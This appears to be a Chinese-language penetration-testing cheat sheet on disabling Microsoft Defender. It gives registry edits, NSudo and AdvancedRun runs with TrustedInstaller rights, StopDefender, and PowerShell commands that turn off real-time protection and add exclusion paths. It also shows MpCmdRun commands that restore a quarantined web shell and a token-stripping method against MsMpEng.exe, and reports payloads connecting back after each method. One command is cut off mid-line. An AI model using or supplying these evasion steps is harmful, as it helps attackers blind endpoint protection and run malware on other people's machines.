NSudoLG
工具地址:https://github.com/M2Team/NSudo
下载后使用:D:\Documents\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe
免杀测试
使用方法
注意:此工具的 -U:T 参数是获取了 TrustedInstaller 权限
#cmd注册表关闭Windows defender reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f #cmd注册表恢复Windows defender reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f #cmd添加Windows defender排除项 reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG_DWORD /f #NSudoLG.exe关闭Windows defender NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f" #NSudoLG.exe恢复Windows defender NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f" #NSudoLG.exe添加Windows defender排除项 NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows De
powershell成功上线
AdvancedRun
地址:https://www.nirsoft.net/utils/advanced_run.html
免杀测试
使用方法
AdvancedRun.exe /EXEFilename "%windir%\system32\cmd.exe" /CommandLine '/c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f' /RunAs 8 /Run
powershell成功上线
StopDefender
Github地址:https://github.com/lab52io/StopDefender
免杀测试
使用方法
StopDefender_x64.exe
powershell成功上线
powershell
#查看排除项 Get-MpPreference | select ExclusionPath #关闭Windows defender Set-MpPreference -DisableRealTimeMonitoring $true #增加排除项 Add-MpPreference -ExclusionPath "c:\temp" #删除排除项 Remove-MpPreference -ExclusionPath "C:\test"
关闭 Windows defender
关闭 实时保护
Set-MpPreference -DisableRealtimeMonitoring $true
其他技巧
MpCmdRun恢复被隔离的文件
MpCmdRun介绍
配置和管理 Microsoft Defender 防病毒软件的命令行工具
详情
寻找MpCmdRun位置
MpCmdRun的位置为:
C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
#查看版本(查看<antimalware platform version>) dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b #验证 dir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0\" | findstr
基础命令
#查看被隔离的文件列表 MpCmdRun -Restore -ListAll #恢复指定名称的文件至原目录 MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php #恢复所有文件至原目录 MpCmdRun -Restore -All #查看指定路径是否位于排除列表中 MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\
移除Token导致Windows Defender失效
Windows Defender进程为MsMpEng.exe,MsMpEng.exe是一个受保护的进程(Protected Process Light,简写为PPL)
非 PPL 进程无法获取 PPL 进程的句柄,导致我们无法直接结束 PPL 进程 MsMpEng.exe, 但是我们能够以 SYSTEM 权限运行的线程修改进程 MsMpEng.exe 的 token, 当我们移除进程 MsMpEng.exe 的所有 token 后,进程 MsMpEng.exe 无法访问其他进程的资源,也就无法检测其他进程是否有害,最终导致 Windows Defender 失效。
本人没有利用成功过
工具地址
https://github.com/pwn1sher/KillDefender
https://github.com/Octoberfest7/KillDefender
https://github.com/Octoberfest7/KDStab
参考文章
https://mp.weixin.qq.com/s/27rvHpsnldnxpJaxwQrLGw
https://zhuanlan.zhihu.com/p/538571344
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender